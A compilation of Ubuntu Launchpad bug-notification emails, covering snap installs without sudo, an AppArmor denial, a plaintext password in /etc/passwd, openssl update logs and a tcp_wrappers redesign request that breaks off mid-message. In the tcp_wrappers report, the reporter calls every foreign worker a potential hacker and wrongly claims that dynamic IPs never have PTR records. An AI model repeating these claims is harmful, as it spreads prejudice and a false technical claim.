  ***
  *** 14,20 
#   (D) = master script downs interface
#   (-) = master script does nothing with this

  ! if [ -x /lib/systemd/systemd-resolved ] ; then
# For safety, first undefine the nasty default make_resolv_conf()
make_resolv_conf() { : ; }
case "$reason" in
  --- 14,21 
#   (D) = master script downs interface
#   (-) = master script does nothing with this

  ! systemctl is-active systemd-resolved > /dev/null 2>&1
  ! if [ $? -eq 0 ]; then
# For safety, first undefine the nasty default make_resolv_conf()
make_resolv_conf() { : ; }
case "$reason" in

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/systemd/+bug/1853164/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp

[Touch-packages] [Bug 1850977] Re: Snap installs software without user having sudo access

[Seth Arnold]

Maciej, that looks like javascript polkit and I believe we're staying on
the pre-javascript version of polkit.

Thanks

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to policykit-1 in Ubuntu.
https://bugs.launchpad.net/bugs/1850977

Title:
  Snap installs software without user having sudo access

Status in gnome-software package in Ubuntu:
  Invalid
Status in policykit-1 package in Ubuntu:
  New
Status in snapd package in Ubuntu:
  Invalid

Bug description:
  $ lsb_release -rd
  Description:  Ubuntu 18.04.2 LTS
  Release:  18.04

  $ apt-cache policy gnome-software
  gnome-software:
Installed: 3.28.1-0ubuntu4.18.04.8
Candidate: 3.28.1-0ubuntu4.18.04.12
Version table:
   3.28.1-0ubuntu4.18.04.12 500
  500 http://us.archive.ubuntu.com/ubuntu bionic-updates/main amd64 
Packages
   *** 3.28.1-0ubuntu4.18.04.8 100
  100 /var/lib/dpkg/status
   3.28.1-0ubuntu4 500
  500 http://us.archive.ubuntu.com/ubuntu bionic/main amd64

  What I expect to happen:
Software is not installed for a user without sudo access.

  What does happen:
  I'm logging in with an LDAP user. This user does not have sudo access.

  When I select software from gnome-software ("Ubuntu Software"), it
  pops up and asks for my users password. I enter this in, and the
  software then installs (tested with blender, libreoffice, opencl
  driver).

  My user does *not* have sudo access on the system.

  $ sudo su -
  [sudo] password for jason: 
  jason is not in the sudoers file.  This incident will be reported.

  It appears these *may* be being installed with Snaps ... which still:

  How, without having root access, can an unprivileged user install
  something onto the system?

  ProblemType: Bug
  DistroRelease: Ubuntu 18.04
  Package: gnome-software 3.28.1-0ubuntu4.18.04.8
  ProcVersionSignature: Ubuntu 5.0.0-32.34~18.04.2-generic 5.0.21
  Uname: Linux 5.0.0-32-generic x86_64
  ApportVersion: 2.20.9-0ubuntu7.5
  Architecture: amd64
  CurrentDesktop: ubuntu:GNOME
  Date: Fri Nov  1 13:53:03 2019
  InstallationDate: Installed on 2019-11-01 (0 days ago)
  InstallationMedia: Ubuntu 18.04.2 LTS "Bionic Beaver" - Release amd64 
(20190210)
  InstalledPlugins:
   gnome-software-plugin-flatpak N/A
   gnome-software-plugin-limba   N/A
   gnome-software-plugin-snap3.28.1-0ubuntu4.18.04.8
  ProcEnviron:
   PATH=(custom, no user)
   XDG_RUNTIME_DIR=
   LANG=en_US.UTF-8
   SHELL=/bin/bash
  SourcePackage: gnome-software
  UpgradeStatus: No upgrade log present (probably fresh install)

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/gnome-software/+bug/1850977/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp

[Touch-packages] [Bug 1851865] Re: bug reporrt

[Seth Arnold]

Thanks for taking the time to report this bug and helping to make Ubuntu
better. We appreciate the difficulties you are facing, but this appears
to be a "regular" (non-security) bug.  I have unmarked it as a security
issue since this bug does not show evidence of allowing attackers to
cross privilege boundaries nor directly cause loss of data/privacy.
Please feel free to report any other bugs you may find.

** Information type changed from Private Security to Public

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to xorg in Ubuntu.
https://bugs.launchpad.net/bugs/1851865

Title:
  bug reporrt

Status in xorg package in Ubuntu:
  New

Bug description:
  Not sure

  ProblemType: Bug
  DistroRelease: Ubuntu 16.04
  Package: xorg 1:7.7+13ubuntu3.1
  ProcVersionSignature: Ubuntu 4.15.0-68.77~16.04.1-generic 4.15.18
  Uname: Linux 4.15.0-68-generic x86_64
  NonfreeKernelModules: wl
  ApportVersion: 2.20.1-0ubuntu2.21
  Architecture: amd64
  CompizPlugins: No value set for 
`/apps/compiz-1/general/screen0/options/active_plugins'
  CompositorRunning: None
  Date: Thu Nov  7 22:17:53 2019
  DistUpgraded: 2019-11-07 17:58:35,255 DEBUG /openCache(), new cache size 90136
  DistroCodename: xenial
  DistroVariant: ubuntu
  DkmsStatus:
   bcmwl, 6.30.223.271+bdcom, 4.15.0-66-generic, x86_64: installed
   bcmwl, 6.30.223.271+bdcom, 4.15.0-68-generic, x86_64: installed
   virtualbox, 5.1.38, 4.15.0-66-generic, x86_64: installed
   virtualbox, 5.1.38, 4.15.0-68-generic, x86_64: installed
  ExtraDebuggingInterest: Yes, including running git bisection searches
  GraphicsCard:
   Intel Corporation Mobile 4 Series Chipset Integrated Graphics Controller 
[8086:2a42] (rev 07) (prog-if 00 [VGA controller])
 Subsystem: Dell Mobile 4 Series Chipset Integrated Graphics Controller 
[1028:02a0]
 Subsystem: Dell Mobile 4 Series Chipset Integrated Graphics Controller 
[1028:02a0]
  InstallationDate: Installed on 2019-11-04 (3 days ago)
  InstallationMedia: Ubuntu-GNOME 16.04.5 LTS "Xenial Xerus" - Release amd64 
(20180731)
  MachineType: Dell Inc. Studio 1737
  ProcEnviron:
   PATH=(custom, no user)
   LANG=en_US.UTF-8
   SHELL=/bin/bash
  ProcKernelCmdLine: BOOT_IMAGE=/boot/vmlinuz-4.15.0-68-generic 
root=UUID=28143eaf-551d-47e2-90aa-bfd9fb618e90 ro quiet splash vt.handoff=7
  SourcePackage: xorg
  UpgradeStatus: Upgraded to xenial on 2019-11-07 (0 days ago)
  dmi.bios.date: 04/14/2011
  dmi.bios.vendor: Dell Inc.
  dmi.bios.version: A09
  dmi.board.name: 0P792H
  dmi.board.vendor: Dell Inc.
  dmi.board.version: A09
  dmi.chassis.type: 8
  dmi.chassis.vendor: Dell Inc.
  dmi.chassis.version: A09
  dmi.modalias: 
dmi:bvnDellInc.:bvrA09:bd04/14/2011:svnDellInc.:pnStudio1737:pvrA09:rvnDellInc.:rn0P792H:rvrA09:cvnDellInc.:ct8:cvrA09:
  dmi.product.name: Studio 1737
  dmi.product.version: A09
  dmi.sys.vendor: Dell Inc.
  version.compiz: compiz N/A
  version.ia32-libs: ia32-libs N/A
  version.libdrm2: libdrm2 2.4.91-2~16.04.1
  version.libgl1-mesa-dri: libgl1-mesa-dri 18.0.5-0ubuntu0~16.04.1
  version.libgl1-mesa-dri-experimental: libgl1-mesa-dri-experimental N/A
  version.libgl1-mesa-glx: libgl1-mesa-glx 18.0.5-0ubuntu0~16.04.1
  version.xserver-xorg-core: xserver-xorg-core N/A
  version.xserver-xorg-input-evdev: xserver-xorg-input-evdev N/A
  version.xserver-xorg-video-ati: xserver-xorg-video-ati N/A
  version.xserver-xorg-video-intel: xserver-xorg-video-intel N/A
  version.xserver-xorg-video-nouveau: xserver-xorg-video-nouveau N/A

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/xorg/+bug/1851865/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp

[Touch-packages] [Bug 1851661] Re: AppArmor denied operation open to snap pick-colour-picker

[Seth Arnold]

Hello Douglas, thanks for the report. AppArmor is one of several tools
the snap packaging system uses to enforce confinement on packages. The
AppArmor project doesn't supply the policy though, just the enforcement
mechanism. I believe you'll need to talk to whoever wrote the snap
package, as they request the privileges necessary when packaging the
application.

Try 'snap info' on the name of the snap package that provides the colour
picker; it should provide some contact details for the packager.

Thanks

** Changed in: apparmor (Ubuntu)
   Status: New => Invalid

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to apparmor in Ubuntu.
https://bugs.launchpad.net/bugs/1851661

Title:
  AppArmor denied operation open to snap pick-colour-picker

Status in apparmor package in Ubuntu:
  Invalid

Bug description:
  I've written an issue here:
  https://github.com/stuartlangridge/ColourPicker/issues/63

  Pick (a color picker distributed as a snap) will not launch. The
  creator of the application believes this to be a problem with my
  system, not with their app. Apparently, AppArmor is preventing it from
  starting. I'm not familiar with this MAC implementation, but the logs
  suggest that this is the problem. See the attachment.

  ```
  nov 07 11:18:29 alq22 audit[27542]: AVC apparmor="DENIED" operation="open" 
profile="snap.pick-colour-picker.pick-colour-picker" name="/proc/27542/mounts" 
pid=27542 comm="python3" requested_mask="r" denied_mask="r" fsuid=1000 ouid=1000
  nov 07 11:18:29 alq22 kernel: audit: type=1400 audit(1573136309.796:304): 
apparmor="DENIED" operation="open" 
profile="snap.pick-colour-picker.pick-colour-picker" name="/proc/27542/mounts" 
pid=27542 comm="python3" requested_mask="r" denied_mask="r" fsuid=1000 ouid=1000
  ```

  This is a fresh installation of Ubuntu 18.04.3. I take great care not
  to mess with system components such as snapd. Other snaps are working
  properly.

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/apparmor/+bug/1851661/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp

[Touch-packages] [Bug 1851300] Re: Xubuntu 18.04 passwd file in etc displays passwd unencrypted

[Seth Arnold]

I've selected the most likely packages to be involved, based on a guess.
Without knowing how the user attempted to set their password though,
this is going to be pretty impossible to track down.

/etc/passwd hasn't had passwords stored in it by default for something
like 25 years. My best guess at the moment is some vastly inappropriate
tool was used somewhere along the way (with suspicion leaning towards
web-based 'consoles').

If you can figure out how this happened (or better yet, tell us how to
recreate it), please do report back and mark the bug New again.

Thanks

** Information type changed from Private Security to Public Security

** Also affects: pam (Ubuntu)
   Importance: Undecided
   Status: New

** Also affects: shadow (Ubuntu)
   Importance: Undecided
   Status: New

** Changed in: base-passwd (Ubuntu)
   Status: New => Incomplete

** Changed in: pam (Ubuntu)
   Status: New => Incomplete

** Changed in: shadow (Ubuntu)
   Status: New => Incomplete

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to base-passwd in Ubuntu.
https://bugs.launchpad.net/bugs/1851300

Title:
  Xubuntu 18.04 passwd file in etc displays passwd unencrypted

Status in base-passwd package in Ubuntu:
  Incomplete
Status in pam package in Ubuntu:
  Incomplete
Status in shadow package in Ubuntu:
  Incomplete

Bug description:
  Hello,

  I have a workshop where I provide mostly Ubuntu community editions in
  computers and help people coming with computers already setup with a
  *buntu version. A lady came to me as she couldn't master her computer,
  (there is someone in town who installs Ubuntu editions without
  teaching his clients how to deal with their machines).

  She has an Ubuntu Xfce (Xubuntu) 18.04.x which is what she currently
  uses, especially as she doesn't know how to boot to the othe OS. :s

  So I chrooted from a live to recreate her Xubuntu user passwd, and oh
  surprise! The /etc/passwd file was showing her password in plain text,
  unencrypted. (I could read it easily, it was her family name!).

  I have not had the time to dig further, check other editions and
  versions exept the ones I use, however I think, as it has happend in
  the paste, the persons in charge should look into it and check all
  recent Ubuntu and community versions editions (if relevant).

  Thanks for your work!

  Best regards,
  Mélodie

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/base-passwd/+bug/1851300/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp

[Touch-packages] [Bug 1845741] Re: package libpam-runtime 1.1.8-3.6ubuntu2 failed to install/upgrade: le paquet est dans un état vraiment incohérent; vous devriez le réinstaller avant de tenter de le

[Seth Arnold]

Thanks for taking the time to report this bug and helping to make Ubuntu
better. We appreciate the difficulties you are facing, but this appears
to be a "regular" (non-security) bug.  I have unmarked it as a security
issue since this bug does not show evidence of allowing attackers to
cross privilege boundaries nor directly cause loss of data/privacy.
Please feel free to report any other bugs you may find.

** Information type changed from Private Security to Public

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to pam in Ubuntu.
https://bugs.launchpad.net/bugs/1845741

Title:
  package libpam-runtime 1.1.8-3.6ubuntu2 failed to install/upgrade: le
  paquet est dans un état vraiment incohérent; vous devriez  le
  réinstaller avant de tenter de le configurer.

Status in pam package in Ubuntu:
  New

Bug description:
  je ne peux telecharger aucune application toujours il me notifie qu'il
  au probléme

  ProblemType: Package
  DistroRelease: Ubuntu 18.04
  Package: libpam-runtime 1.1.8-3.6ubuntu2
  ProcVersionSignature: Ubuntu 4.15.0-20.21-generic 4.15.17
  Uname: Linux 4.15.0-20-generic x86_64
  ApportVersion: 2.20.9-0ubuntu7
  AptOrdering:
   libpam-runtime:amd64: Configure
   cups-browsed:amd64: Install
   NULL: ConfigurePending
  Architecture: amd64
  Date: Sat Sep 28 00:43:19 2019
  DpkgTerminalLog:
   dpkg: erreur de traitement du paquet libpam-runtime (--configure) :
le paquet est dans un état vraiment incohérent; vous devriez
le réinstaller avant de tenter de le configurer.
  ErrorMessage: le paquet est dans un état vraiment incohérent; vous devriez  
le réinstaller avant de tenter de le configurer.
  InstallationDate: Installed on 2018-05-12 (503 days ago)
  InstallationMedia: Ubuntu 18.04 LTS "Bionic Beaver" - Release amd64 (20180426)
  PackageArchitecture: all
  Python3Details: /usr/bin/python3.6, Python 3.6.5, python3-minimal, 3.6.5-3
  PythonDetails: /root/Error: command ['which', 'python'] failed with exit code 
1:, Error: [Errno 2] Aucun fichier ou dossier de ce type: "/root/Error: command 
['which', 'python'] failed with exit code 1:": "/root/Error: command ['which', 
'python'] failed with exit code 1:", unpackaged
  RelatedPackageVersions:
   dpkg 1.19.0.5ubuntu2.1
   apt  1.6.3ubuntu0.1
  SourcePackage: pam
  Title: package libpam-runtime 1.1.8-3.6ubuntu2 failed to install/upgrade: le 
paquet est dans un état vraiment incohérent; vous devriez  le réinstaller avant 
de tenter de le configurer.
  UpgradeStatus: No upgrade log present (probably fresh install)

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/pam/+bug/1845741/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp

[Touch-packages] [Bug 1832421] Re: openssl reboot needed message using incorrect path to X server

[Seth Arnold]

Seems to work fine on disco:

sarnold@millbarge:~$ sudo apt install libssl1.1 openssl
Reading package lists... Done
Building dependency tree   
Reading state information... Done
The following packages were automatically installed and are no longer required:
  linux-image-5.0.0-20-generic linux-image-5.0.0-21-generic 
linux-image-5.0.0-23-generic linux-modules-5.0.0-20-generic 
linux-modules-5.0.0-21-generic linux-modules-5.0.0-23-generic
  linux-modules-extra-5.0.0-20-generic linux-modules-extra-5.0.0-21-generic 
linux-modules-extra-5.0.0-23-generic
Use 'sudo apt autoremove' to remove them.
The following packages will be upgraded:
  libssl1.1 openssl
2 upgraded, 0 newly installed, 0 to remove and 23 not upgraded.
Need to get 1,928 kB of archives.
After this operation, 15.4 kB of additional disk space will be used.
Get:1 http://wopr/ubuntu disco-proposed/main amd64 libssl1.1 amd64 
1.1.1b-1ubuntu2.4 [1,305 kB]
Get:2 http://wopr/ubuntu disco-proposed/main amd64 openssl amd64 
1.1.1b-1ubuntu2.4 [624 kB]
Fetched 1,928 kB in 0s (15.5 MB/s)
Preconfiguring packages ...
(Reading database ... 91100 files and directories currently installed.)
Preparing to unpack .../libssl1.1_1.1.1b-1ubuntu2.4_amd64.deb ...
Unpacking libssl1.1:amd64 (1.1.1b-1ubuntu2.4) over (1.1.1b-1ubuntu2.1) ...
Preparing to unpack .../openssl_1.1.1b-1ubuntu2.4_amd64.deb ...
Unpacking openssl (1.1.1b-1ubuntu2.4) over (1.1.1b-1ubuntu2.1) ...
Setting up libssl1.1:amd64 (1.1.1b-1ubuntu2.4) ...
Setting up openssl (1.1.1b-1ubuntu2.4) ...
Processing triggers for man-db (2.8.5-2) ...
Processing triggers for libc-bin (2.29-0ubuntu2) ...
sarnold@millbarge:~$ sudo apt install libssl1.1=1.1.1b-1ubuntu2.1 
openssl=1.1.1b-1ubuntu2.1
Reading package lists... Done
Building dependency tree   
Reading state information... Done
The following packages were automatically installed and are no longer required:
  linux-image-5.0.0-20-generic linux-image-5.0.0-21-generic 
linux-image-5.0.0-23-generic linux-modules-5.0.0-20-generic 
linux-modules-5.0.0-21-generic linux-modules-5.0.0-23-generic
  linux-modules-extra-5.0.0-20-generic linux-modules-extra-5.0.0-21-generic 
linux-modules-extra-5.0.0-23-generic
Use 'sudo apt autoremove' to remove them.
The following packages will be DOWNGRADED:
  libssl1.1 openssl
0 upgraded, 0 newly installed, 2 downgraded, 0 to remove and 23 not upgraded.
Need to get 0 B/1,921 kB of archives.
After this operation, 15.4 kB disk space will be freed.
Do you want to continue? [Y/n] 
Preconfiguring packages ...
dpkg: warning: downgrading libssl1.1:amd64 from 1.1.1b-1ubuntu2.4 to 
1.1.1b-1ubuntu2.1
(Reading database ... 91100 files and directories currently installed.)
Preparing to unpack .../libssl1.1_1.1.1b-1ubuntu2.1_amd64.deb ...
Unpacking libssl1.1:amd64 (1.1.1b-1ubuntu2.1) over (1.1.1b-1ubuntu2.4) ...
dpkg: warning: downgrading openssl from 1.1.1b-1ubuntu2.4 to 1.1.1b-1ubuntu2.1
Preparing to unpack .../openssl_1.1.1b-1ubuntu2.1_amd64.deb ...
Unpacking openssl (1.1.1b-1ubuntu2.1) over (1.1.1b-1ubuntu2.4) ...
Setting up libssl1.1:amd64 (1.1.1b-1ubuntu2.1) ...
Setting up openssl (1.1.1b-1ubuntu2.1) ...
Processing triggers for man-db (2.8.5-2) ...
Processing triggers for libc-bin (2.29-0ubuntu2) ...
sarnold@millbarge:~$ sudo apt install libssl1.1 openssl
Reading package lists... Done
Building dependency tree   
Reading state information... Done
The following packages were automatically installed and are no longer required:
  linux-image-5.0.0-20-generic linux-image-5.0.0-21-generic 
linux-image-5.0.0-23-generic linux-modules-5.0.0-20-generic 
linux-modules-5.0.0-21-generic linux-modules-5.0.0-23-generic
  linux-modules-extra-5.0.0-20-generic linux-modules-extra-5.0.0-21-generic 
linux-modules-extra-5.0.0-23-generic
Use 'sudo apt autoremove' to remove them.
The following packages will be upgraded:
  libssl1.1 openssl
2 upgraded, 0 newly installed, 0 to remove and 23 not upgraded.
Need to get 1,928 kB of archives.
After this operation, 15.4 kB of additional disk space will be used.
Get:1 http://wopr/ubuntu disco-proposed/main amd64 libssl1.1 amd64 
1.1.1b-1ubuntu2.4 [1,305 kB]
Get:2 http://wopr/ubuntu disco-proposed/main amd64 openssl amd64 
1.1.1b-1ubuntu2.4 [624 kB]
Fetched 1,928 kB in 0s (68.3 MB/s)
Preconfiguring packages ...
(Reading database ... 91100 files and directories currently installed.)
Preparing to unpack .../libssl1.1_1.1.1b-1ubuntu2.4_amd64.deb ...
Unpacking libssl1.1:amd64 (1.1.1b-1ubuntu2.4) over (1.1.1b-1ubuntu2.1) ...
Preparing to unpack .../openssl_1.1.1b-1ubuntu2.4_amd64.deb ...
Unpacking openssl (1.1.1b-1ubuntu2.4) over (1.1.1b-1ubuntu2.1) ...
Setting up libssl1.1:amd64 (1.1.1b-1ubuntu2.4) ...
Setting up openssl (1.1.1b-1ubuntu2.4) ...
Processing triggers for man-db (2.8.5-2) ...
Processing triggers for libc-bin (2.29-0ubuntu2) ...


** Tags added: verification-done-disco

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to openssl in Ubuntu.

[Touch-packages] [Bug 1832522] Re: openssl maintainer scripts do not trigger services restart

[Seth Arnold]

Seems to work fine from disco:

sarnold@millbarge:~$ sudo apt install libssl1.1 openssl
Reading package lists... Done
Building dependency tree   
Reading state information... Done
The following packages were automatically installed and are no longer required:
  linux-image-5.0.0-20-generic linux-image-5.0.0-21-generic 
linux-image-5.0.0-23-generic linux-modules-5.0.0-20-generic 
linux-modules-5.0.0-21-generic linux-modules-5.0.0-23-generic
  linux-modules-extra-5.0.0-20-generic linux-modules-extra-5.0.0-21-generic 
linux-modules-extra-5.0.0-23-generic
Use 'sudo apt autoremove' to remove them.
The following packages will be upgraded:
  libssl1.1 openssl
2 upgraded, 0 newly installed, 0 to remove and 23 not upgraded.
Need to get 1,928 kB of archives.
After this operation, 15.4 kB of additional disk space will be used.
Get:1 http://wopr/ubuntu disco-proposed/main amd64 libssl1.1 amd64 
1.1.1b-1ubuntu2.4 [1,305 kB]
Get:2 http://wopr/ubuntu disco-proposed/main amd64 openssl amd64 
1.1.1b-1ubuntu2.4 [624 kB]
Fetched 1,928 kB in 0s (15.5 MB/s)
Preconfiguring packages ...
(Reading database ... 91100 files and directories currently installed.)
Preparing to unpack .../libssl1.1_1.1.1b-1ubuntu2.4_amd64.deb ...
Unpacking libssl1.1:amd64 (1.1.1b-1ubuntu2.4) over (1.1.1b-1ubuntu2.1) ...
Preparing to unpack .../openssl_1.1.1b-1ubuntu2.4_amd64.deb ...
Unpacking openssl (1.1.1b-1ubuntu2.4) over (1.1.1b-1ubuntu2.1) ...
Setting up libssl1.1:amd64 (1.1.1b-1ubuntu2.4) ...
Setting up openssl (1.1.1b-1ubuntu2.4) ...
Processing triggers for man-db (2.8.5-2) ...
Processing triggers for libc-bin (2.29-0ubuntu2) ...
sarnold@millbarge:~$ sudo apt install libssl1.1=1.1.1b-1ubuntu2.1 
openssl=1.1.1b-1ubuntu2.1
Reading package lists... Done
Building dependency tree   
Reading state information... Done
The following packages were automatically installed and are no longer required:
  linux-image-5.0.0-20-generic linux-image-5.0.0-21-generic 
linux-image-5.0.0-23-generic linux-modules-5.0.0-20-generic 
linux-modules-5.0.0-21-generic linux-modules-5.0.0-23-generic
  linux-modules-extra-5.0.0-20-generic linux-modules-extra-5.0.0-21-generic 
linux-modules-extra-5.0.0-23-generic
Use 'sudo apt autoremove' to remove them.
The following packages will be DOWNGRADED:
  libssl1.1 openssl
0 upgraded, 0 newly installed, 2 downgraded, 0 to remove and 23 not upgraded.
Need to get 0 B/1,921 kB of archives.
After this operation, 15.4 kB disk space will be freed.
Do you want to continue? [Y/n] 
Preconfiguring packages ...
dpkg: warning: downgrading libssl1.1:amd64 from 1.1.1b-1ubuntu2.4 to 
1.1.1b-1ubuntu2.1
(Reading database ... 91100 files and directories currently installed.)
Preparing to unpack .../libssl1.1_1.1.1b-1ubuntu2.1_amd64.deb ...
Unpacking libssl1.1:amd64 (1.1.1b-1ubuntu2.1) over (1.1.1b-1ubuntu2.4) ...
dpkg: warning: downgrading openssl from 1.1.1b-1ubuntu2.4 to 1.1.1b-1ubuntu2.1
Preparing to unpack .../openssl_1.1.1b-1ubuntu2.1_amd64.deb ...
Unpacking openssl (1.1.1b-1ubuntu2.1) over (1.1.1b-1ubuntu2.4) ...
Setting up libssl1.1:amd64 (1.1.1b-1ubuntu2.1) ...
Setting up openssl (1.1.1b-1ubuntu2.1) ...
Processing triggers for man-db (2.8.5-2) ...
Processing triggers for libc-bin (2.29-0ubuntu2) ...
sarnold@millbarge:~$ sudo apt install libssl1.1 openssl
Reading package lists... Done
Building dependency tree   
Reading state information... Done
The following packages were automatically installed and are no longer required:
  linux-image-5.0.0-20-generic linux-image-5.0.0-21-generic 
linux-image-5.0.0-23-generic linux-modules-5.0.0-20-generic 
linux-modules-5.0.0-21-generic linux-modules-5.0.0-23-generic
  linux-modules-extra-5.0.0-20-generic linux-modules-extra-5.0.0-21-generic 
linux-modules-extra-5.0.0-23-generic
Use 'sudo apt autoremove' to remove them.
The following packages will be upgraded:
  libssl1.1 openssl
2 upgraded, 0 newly installed, 0 to remove and 23 not upgraded.
Need to get 1,928 kB of archives.
After this operation, 15.4 kB of additional disk space will be used.
Get:1 http://wopr/ubuntu disco-proposed/main amd64 libssl1.1 amd64 
1.1.1b-1ubuntu2.4 [1,305 kB]
Get:2 http://wopr/ubuntu disco-proposed/main amd64 openssl amd64 
1.1.1b-1ubuntu2.4 [624 kB]
Fetched 1,928 kB in 0s (68.3 MB/s)
Preconfiguring packages ...
(Reading database ... 91100 files and directories currently installed.)
Preparing to unpack .../libssl1.1_1.1.1b-1ubuntu2.4_amd64.deb ...
Unpacking libssl1.1:amd64 (1.1.1b-1ubuntu2.4) over (1.1.1b-1ubuntu2.1) ...
Preparing to unpack .../openssl_1.1.1b-1ubuntu2.4_amd64.deb ...
Unpacking openssl (1.1.1b-1ubuntu2.4) over (1.1.1b-1ubuntu2.1) ...
Setting up libssl1.1:amd64 (1.1.1b-1ubuntu2.4) ...
Setting up openssl (1.1.1b-1ubuntu2.4) ...
Processing triggers for man-db (2.8.5-2) ...
Processing triggers for libc-bin (2.29-0ubuntu2) ...


** Tags removed: verification-needed-disco
** Tags added: verification-done-disco

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, 

[Touch-packages] [Bug 1839598] Re: tcp_wrappers does not whitelisting of domains, vs IPs

[Seth Arnold]

Hello Federico,

Wietse is correct. You will not get security benefits from your proposed
changes.

Public key authentication, combined with a 2FA mechanism such as TOTP
for interactive users, is the current best practice.

IP filtering is a useful tool; you can already have good benefits from
allowing the /16 or /24 or whatever address ranges your contractors are
expected to be using. That will drastically reduce the number of
compromised hosts on the internet that can contact your server and
perform password brute-force authentication attempts.

The single best security improvement you can make is disable password
authentication in openssh-server and require authorized_keys to log in.

We will not make drastic changes to the design and implementation of
tcp-wrappers.

Thanks for your interest in making Ubuntu more secure

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to tcp-wrappers in Ubuntu.
https://bugs.launchpad.net/bugs/1839598

Title:
  tcp_wrappers does not whitelisting of domains, vs IPs

Status in tcp-wrappers package in Ubuntu:
  New

Bug description:
  TCP Wrappers (also known as tcp_wrappers) is a host-based networking ACL 
system, used to filter network access to Internet Protocol servers. It allows 
host or subnetwork IP addresses, names and/or ident query replies, to be used 
as tokens on which to filter for access control purposes. The original code was 
written by Wietse Venema in 1990 He maintained it until 1995, and on June 1, 
2001, released it under its own BSD-style license. The tarball includes a 
library named Libwrap that implements the actual functionality. I had an email 
conversation with him that lead to nowhere. He does not agree with my request 
for a redesign.
  Very concisely, there is no way as of now to whitelist a domain, vs an IP 
address. You need to know the IP address to which the domain resolves to 
beforehand, which makes domain updates impossible to process. This causes 
tremendous operational problems when the person you need to give access to has 
an IP address that changes often. 
  But I need to digress. Every foreign worker is a potential hacker, for there 
is no way to perform a security check on her/him. Many companies use them 
nevertheless because of the low cost. I know a company that hires North Korean 
engineers working out of mainland China. They log in for legitimate purposes to 
American corporate servers. They actually live in North Korea and are forced to 
back home every 3 weeks. They only have access to dynamic IP addresses, where a 
PTR record does not exist, thus, no reverse-hostname is possible. As a fact: no 
dynamic IP address has a corresponding PTR record.
  The question is how to whitelist a remote worker’s IP automatically. This 
issue cannot be easily solved since commercial VPNs do not guarantee that the 
same IP will be offered on the next connection. Many small companies that hire 
foreign workers end up creating fence servers, but that is exponentially more 
insecure since now you have a potential hacker sitting comfortably inside your 
firewall, behind your line of defense. Your network may have access to other 
companies networks, all the way up to a power station or a government facility, 
maybe a nuclear facility. A very somber scenario.
  Since Libwrap is the ultimate defense to keep hackers from controlling your 
servers, it should ONLY verify if an incoming connection resolves to a domain 
listed in /etc/hosts.allow. It does not. Prior, it performs a hostname check 
that invariably fails unless the pair IP address/ domain exists in /etc/hosts, 
but of course that information changes sometimes hourly. As a result of this 
problem, you cannot use it as a gatekeeper for remote access from dynamic IP 
addresses, increasing your level of insecurity.
  As I said, I explained all these ideas to the author, Wietse, without 
success. He insisted that using a public key was how you protect servers. I 
disagree. Without Libwrap, which means IP whitelisting, a simple public key 
mechanism is suicidal. It is very easy to see why. In a first step, a hacker 
steals the pair public-private key from a box which has legitimate access to 
your network. Then he uses the pair in another box located in his country, from 
which he will access your network as if he were the legitimate client or 
worker. It happened to me already. Libwrap applied to a domain plus public key 
will perform infinitely better than a public key alone. In fact, public key 
alone should not be used at all. This is obvious since by using it, you are 
delegating your security to the box you are allowing to connect, so your entire 
network is now as secure as your client or worker’s home network, which you 
don’t control. You just opened the doors of your company wide-open.
  What I suggest is to modify Libwrap so a domain listed in /etc/hosts.allow 
would work for real, just performing a simple DNS 

[Touch-packages] [Bug 1839598] Re: tcp_wrappers does not whitelisting of domains, vs IPs

[Seth Arnold]

** Information type changed from Private Security to Public

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to tcp-wrappers in Ubuntu.
https://bugs.launchpad.net/bugs/1839598

Title:
  tcp_wrappers does not whitelisting of domains, vs IPs

Status in tcp-wrappers package in Ubuntu:
  New

Bug description:
  TCP Wrappers (also known as tcp_wrappers) is a host-based networking ACL 
system, used to filter network access to Internet Protocol servers. It allows 
host or subnetwork IP addresses, names and/or ident query replies, to be used 
as tokens on which to filter for access control purposes. The original code was 
written by Wietse Venema in 1990 He maintained it until 1995, and on June 1, 
2001, released it under its own BSD-style license. The tarball includes a 
library named Libwrap that implements the actual functionality. I had an email 
conversation with him that lead to nowhere. He does not agree with my request 
for a redesign.
  Very concisely, there is no way as of now to whitelist a domain, vs an IP 
address. You need to know the IP address to which the domain resolves to 
beforehand, which makes domain updates impossible to process. This causes 
tremendous operational problems when the person you need to give access to has 
an IP address that changes often. 
  But I need to digress. Every foreign worker is a potential hacker, for there 
